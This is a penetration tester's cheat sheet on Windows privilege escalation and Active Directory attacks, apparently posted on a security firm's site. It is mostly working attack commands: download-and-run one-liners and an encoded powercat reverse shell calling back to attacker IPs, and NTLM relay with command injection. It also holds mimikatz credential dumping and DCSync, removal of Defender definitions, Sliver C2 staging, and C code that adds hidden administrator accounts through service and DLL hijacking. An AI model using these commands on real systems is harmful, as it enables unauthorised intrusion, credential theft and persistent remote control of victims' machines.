+45 45 34 44 00
Need a penetration test?
Contact us for a no-obligation conversation about your security needs.
Contact usWindows Privilege Escalation
A good guide https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/
https://0xarun.medium.com/complete-windows-privilege-escalation-9841d5ab82a6
gci C:\ -r -include proof.txt -ea 0 gci C:\ -r -include local.txt -ea 0
gci C:\ -r -include id_rsa -ea 0
Default TEMP C:\Users\default\AppData\Local\Temp
iwr -uri http://192.168.45.249:88/agent.exe -Outfile agent.exe ; .\agent.exe
iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe iwr -uri http://192.168.45.188:8000/a.exe -Outfile C:\Users\default\AppData\Local\Temp\a.exe ; C:\Users\default\AppData\Local\Temp\a.exe
iwr -uri http://192.168.45.188:8000/beRoot.exe -Outfile beRoot.exe
nxc smb 172.16.175.10-14 172.16.175.82-83 -u joe -p Flowers1 -X “iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe”
whoami /priv SeImpersonatePrivilege allows impersonation (but not creation) of any token • SeBackupPrivilege allows read access to entire filesystem • SeRestorePrivilege allows write access to entire filesystem • SeLoadDriverPrivilege allows loading drivers • SeDebugPrivilege allows debugging other processes
SeImpersonatePrivilege sliver getsystem wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe upload PrintSpoofer64.exe .\PrintSpoofer64.exe -i -c powershell.exe
if failing and you have permissions, check printspooler sc qc spooler sc stop Spooler sc start Spooler
Write to admin$ -> impacket-psexec / impacket-smbexec wmi / RPC -> impacket-wmiexec / evil-winrm RPC -> AtExec DCOM -> DcomExec
pass-the-hash
xfree supports
/pth:
if “Restricted Admin Mode” is on then nxc smb hermes -u “offsec” -H “f8f68debc29a963c7a8eb39ca4459f87” -x ‘reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f’
Work in progress sharpsh -h -c “powershell .\winPEASx64.exe” -u http://192.168.45.188:8000/winPEASx64.exe måske sharpsh – ‘-u http://192.168.56.1:9090/PowerView.ps1 -e -c RwBlAHQALQBEAG8AbQBhAGkAbgBHAHIAbwB1AHAAIAAiAEQAbwBtAGEAaQBuACAAQQBkAG0AaQBuAHMAIgA=’
as DC admin sharpsecdump ’’ -target=192.168
recon a windows machine from sliver whoami getprivs env ps -T netstat -l ifconfig -A pwd
As domain user list all spn service principal names
execute -o – setspn.exe -Q /
next run bof-roast - https://github.com/cube0x0/BofRoast/blob/main/BofRoast/apreq2hashcat.py
bof-roast TERMSRV/SECURE
https://github.com/sliverarmory/SharpView/blob/master/README.md sharpview – Get-NetDomain sharpview – Get-NetComputer sharpview – Get-NetUser sharpview – Get-NetShare
List domain groups and members. Needs LDAP access sharpview – Get-sharpview – Get-NetShare sharpview – Get-DomainGroup sharpview – get-domainuser
audit sharpup -t 200 – audit
privescCheck.ps1 - https://github.com/itm4n/PrivescCheck upload /usr/share/powershell-empire/empire/server/data/module_source/privesc/PrivescCheck.ps1 powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck” execute -X -n privcesccheck powershell -ep bypass -c “. .\PrivescCheck.ps1; Invoke-PrivescCheck”
https://github.com/orgs/sliverarmory/repositories?type=all sliver armory docs
Antivirus
execute -o cmd /c “C:\Program Files\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All
Sharphound 4!! sharp-hound-4 – ‘-c all,GPOLocalGroup’
Dump Windows SAM hashes hashdump
Network
Windows RDP
xfreerdp3 /u:user /d:domain /v:192.168.229.75 /p:'password' /drive:tmp,tmp
Powershell portscan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2>$null
reverse powershell via winrm
python3 -m http.server 8000
nc -lvnp 4242
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
iconv -f utf-8 -t utf-16le <<EOF | base64 -w0
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.188:8000/powercat.ps1');powercat -c 192.168.45.188 -p 4242 -e powershell
EOF
crackmapexec winrm -u apache -p 'New2Era4.!' --local-auth 192.168.175.96 -x 'powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA4ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgA0ADUALgAxADgAOAAgAC0AcAAgADQAMgA0ADIAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAAoA'
Active Directory
SMB password spray
crackmapexec smb 192.168.164.242 -u username.txt -p password.txt --shares --continue-on-success
crackmapexec smb 192.168.200.76 -u pete -p 'Nexus123!' -d corp.com --continue-on-success
impacket-GetNPUsers -dc-ip 192.168.133.70 -request -outputfile hashes.asreproast corp.com/pete
AD mapping
bloodhound-python -c All -u stephanie -p 'LegmanTeamBenzoin!!' -gc 'corp.com' -dc 192.168.133.75
en anden metode, som både importere i neo4j database og markere når den kan logge på en account
~/.nxc/nxc.conf
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = user
bh_pass = pass
nxc ldap <ip> -u user -p pass --bloodhound --collection All
Windows commands
iwr -uri http://192.168.45.188:8000/winPEASx64.exe -Outfile winPEASx64.exe
iwr -uri http://192.168.45.188:8000/rustscan.exe -Outfile rustscan.exe
iwr -uri http://192.168.45.188:8000/a.exe -Outfile a.exe ; .\a.exe
certutil.exe -urlcache -split -f http://192.168.45.188:4000/a.exe a.exe
gci C:\ -r -include local.txt -ea 0 | % { gc $_ }
gci C:\ -r -include proof.txt -ea 0 | % { gc $_ }
gci C:\ -r -include proof.txt -include local.txt -ea 0
Windows remote shell
evil-winrm -i 192.168.202.97 -u charlotte -p 'Game2On4.!'
Windows GPO https://github.com/FSecureLABS/SharpGPOAbuse
dir "\\secura.yzx\SysVol\secura.yzx\Policies\"
get-gpo -guid "{31B2F340-016D-11D2-945F-00C04FB984F9}"
.\SharpGPOAbuse.exe --AddLocalAdmin --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --useraccount charlotte --GPOName "Default Domain Policy"
dir "\\secura.yzx\SysVol\secura.yzx\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Load sliver to windows via powershell
iconv -f utf-8 -t utf-16le <<EOF | base64 -w0
powershell -Command "iwr http://192.168.45.188/agent.exe -OutFile \"$env:TEMP\agent.exe\"; start \"$env:TEMP\agent.exe\""
EOF
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "powershell -enc JAB0AGUAbQBwACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsAIAAkAG8AdQB0ACAAPQAgAEoAbwBpAG4ALQBQAGEAdABoACAAJAB0AGUAbQBwACAAJwBBAFMAUwBPAEMASQBBAFQARQBEAF8ARABFAFQARQBOAFQASQBPAE4ALgBlAHgAZQAnADsAIABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOAA4AC8AQQBTAFMATwBDAEkAQQBUAEUARABfAEQARQBUAEUATgBUAEkATwBOAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACQAbwB1AHQAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAG8AdQB0AAoA"
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "set TMPFILE=%TEMP%\a.exe && bitsadmin /transfer x http://192.168.45.188/ASSOCIATED_DETENTION.exe %TMPFILE% && %TMPFILE%"
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.164.242 -c "set TMPFILE=%TEMP%\a.exe && certutil -urlcache -split -f http://192.168.45.188/ASSOCIATED_DETENTION.exe %TMPFILE% && %TMPFILE%"
C2 with sliver
sliver-server
generate --mtls 192.168.45.188
mtls
use 5aa53b92
whoami
getprivs
upload /usr/share/peass/winpeas/winPEASx64.exe
execute -o -t 600 winPEASx64.exe
armory install c2tc-klist
c2tc-klist
cd c:\users\public
upload /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
shell
powershell -ep bypass
Import-Module .\Sharphound.ps1
Invoke-BloodHound -CollectionMethod All
exit
download 20250420081619_BloodHound.zip
socks5 start
check socks5 porten 1081!
sudo proxychains -q nmap -sT -Pn -p 21,80,443 172.16.120.240 172.16.120.241 172.16.120.254
proxychains -q crackmapexec smb 172.16.120.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares
proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.120.240 'beyond.com/john:dqsTwTpZPn#nL' -outputfile kerberoastables.txt
C2 with sliver mikikatz
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimilib.dll
upload /usr/share/windows-resources/mimikatz/x64/mimispool.dll
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
minikatz
see more at https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet?tab=readme-ov-file
https://github.com/gentilkiwi/mimikatz/wiki
all
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::tickets" "lsadump::dcsync /user:corp\dave" "misc::memssp"
mimikatz “privilege::debug” “sekurlsa::logonpasswords” “sekurlsa::tickets” “lsadump::dcsync /user:secura.yzx\Eric.Wallows” “misc::memssp”
:EricLikesRunning800
whoami mimikatz “token::whoami /full”
remote dekstop sessions mimikatz “ts::sessions” “exit”
extract domain hashes
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"
kerberos TGT and service tickets
mimikatz "sekurlsa::tickets" "exit"
DC sync, user must have Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.
mimikatz "lsadump::dcsync /user:corp\dave" "exit"
pass the ticket
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"
mimikatz “privilege::debug” “misc::memssp”
.\mimikatz.exe “vault::cred” “vault::list” “token::elevate” “vault::cred” “vault::list” “lsadump::sam” “lsadump::secrets” “lsadump::cache” “token::revert” “exit”
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
show shares
sharpmapexec ntlm smb /user:Eric.Wallows /password:EricLikesRunning800 /computername:192.168.175.97 /m:shares
LDAP
ldapdomaindump 192.168.175.97 -u 'secura\Eric.Wallows' -p 'EricLikesRunning800' -o ldapdomaindumpdir
Windows Privilege Escalation
The following listing contains some useful well-known SIDs in the context of privilege escalation.
S-1-0-0 Nobody S-1-1-0 Everybody S-1-5-11 Authenticated Users S-1-5-18 Local System S-1-5-domainidentifier-500 Administrator
From Windows Vista onward, processes run on five integrity levels:
- System integrity – Kernel-mode processes with SYSTEM privileges
- High integrity – Processes with administrative privileges
- Medium integrity – Processes running with standard user privileges
- Low integrity level – Restricted processes, often used for security sandboxing, such as web browsers.
- Untrusted – The lowest integrity level, assigned to highly restricted processes that pose potential security risks
Situational Awareness
There are several key pieces of information we should always obtain:
- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes
Show my groups
whoami /groups
Show local users
Get-LocalUser
Show local groups
Get-LocalGroup
Show members of local group
Get-LocalGroupMember adminteam
Show system info
systeminfo
Net commands
ipconfig /all
route print
netstat -ano
List installed programs
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process
Hidden in Plain View
Find keypass DB
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
search for more files
Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
search for them all
Get-ChildItem -Path C:\ -Include *.kdbx,flag.txt,*.ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.kdbx,flag.txt -File -Recurse -ErrorAction SilentlyContinue
show the flag
gci C:\Users -r -include flag.txt -ea 0 | % { gc $_ }
Run command as another user
if active user, use PsExec
if Log on as a batch job access right see schtasks /? or https://ss64.com/ps/scheduler.html
if login via GUI, use runas /user:
Information Goldmine PowerShell
Logging https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.host/start-transcript https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.host/start-transcript
See cmd and powershell history
Get-History
(Get-PSReadlineOption).HistorySavePath
PowerShell logging can be enabled https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.5&viewFallbackFrom=powershell-7.2 Eventlog - Applications and Services Logs - Microsoft - Windows - Powershell - Operational - filter eventid 4104
WinRM shell via 5985/tcp https://github.com/Hackplayers/evil-winrm
evil-winrm -i 192.168.108.220 -u daveadmin -p 'qwertqwertqwert123!!'
Automated Enumeration
sudo apt install peass
cp /usr/share/peass/winpeas/winPEASx64.exe .
python3 -m http.server 80
nc 192.168.50.220 4444
iwr -uri http://192.168.45.161/winPEASx64.exe -Outfile winPEAS.exe
.\winPEAS.exe
Seatbelt https://github.com/GhostPack/Seatbelt Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives.
Compiled https://github.com/r3motecontrol/Ghostpack-CompiledBinaries iwr -uri http://192.168.45.161/Seatbelt.exe -Outfile Seatbelt.exe
Service Binary Hijacking List services and binary filepath
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Check permission
icacls "C:\xampp\apache\bin\httpd.exe"
C script adduser.c adds the user dave2
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user dave2 password123! /add");
i = system ("net localgroup administrators dave2 /add");
return 0;
}
Compile
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
check service
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
sc.exe query mysql
check my privileges (state shows if the privilege is in use, so we have all shown privileges)
whoami /priv
reboot linux
reboot now
reboot
shutdown /r /t 0
Check administrators
Get-LocalGroupMember administrators
Try to automate the above process with https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
iwr -uri http://192.168.45.161/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-ModifiableServiceFile
This doesn’t work
Install-ServiceBinary -Name 'mysql'
So we use
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
$ModifiableFiles
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument' | Get-ModifiablePath -Literal
$ModifiableFiles
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe argument -conf=C:\test\path' | Get-ModifiablePath -Literal
$ModifiableFiles
DLL Hijacking
safe DLL search mode
- The directory from which the application loaded.
- The system directory.
- The 16-bit system directory.
- The Windows directory.
- The current directory.
- The directories that are listed in the PATH environment variable.
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
TextShaping.cpp
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user dave3 password123! /add");
i = system ("net localgroup administrators dave3 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
compile
x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll
Unquoted Service Paths
C:\Program Files\My Program\My Service\service.exe :
C:\Program.exeC:\Program Files\My.exeC:\Program Files\My Program\My.exeC:\Program Files\My Program\My service\service.exe
Look for services with space and no quotes
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Find services with space in name
wmic service get name,pathname|findstr /i /v "C:\Windows\\"|findstr /i /v """
copy adduser.exe
iwr -uri http://192.168.48.3/adduser.exe -Outfile Current.exe
copy .\Current.exe 'C:\Program Files\Enterprise Apps\Current.exe'
start service - aka run adduser.exe
Start-Service GammaService
repeat for PowerUp
iwr http://192.168.48.3/PowerUp.ps1 -Outfile PowerUp.ps1
powershell -ep bypass
. .\PowerUp.ps1
Get-UnquotedService
Abusing Other Windows Components
Scheduled Tasks
schtasks /query
schtasks /query /fo LIST /v
filter out system stuff
(schtasks /query /fo LIST /v | Out-String -Stream) -join "`n" -split "\r?\n\r?\n" | Where-Object { ($_ -match "Task To Run:\s*(.+)") -and ($matches[1] -notmatch "(?i)^(%SystemRoot%|%windir%)\\system32" -and $matches[1] -notmatch "(?i)com handler") } | ForEach-Object { "$_`n----------------------------------------" }
check permissions
schtasks /query /fo LIST /v | Select-String "Task To Run:\s*(.+)" | ForEach-Object {
$path = $_.Matches.Groups[1].Value
if ($path -notmatch "(?i)^(%SystemRoot%|%windir%)\\system32|com handler") {
$acl = Get-Acl $path -ErrorAction SilentlyContinue
$hasAccess = ($acl.Access | Where-Object {
$_.IdentityReference -match $env:USERNAME -and $_.FileSystemRights -match "Write|FullControl"
}) -ne $null
[PSCustomObject]@{
TaskPath = $path
CanModifyFile = $hasAccess
}
}
}
icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
iwr -uri http://192.168.48.3/adduser.exe -Outfile Current.exe
show flags
gci C:\Users -r -Filter flag.txt -ea 0 | % { gc $_.FullName }
Using Exploits
whoami /priv
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
https://github.com/sickn3ss/exploits/tree/master/CVE-2023-29360/x64/Release
whoami /priv
If user with ‘SeImpersonatePrivilege’ (or ‘SeAssignPrimaryTokenPrivilege’) user rights, use: https://github.com/tylerdotrar/SigmaPotato Background https://jlajara.gitlab.io/Potatoes_Windows_Privesc
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
python3 -m http.server 80
Download it to Windows
iwr -uri http://192.168.45.161/SigmaPotato.exe -OutFile SigmaPotato.exe
.\SigmaPotato "net user dave4 lab /add"
.\SigmaPotato "net localgroup Administrators dave4 /add"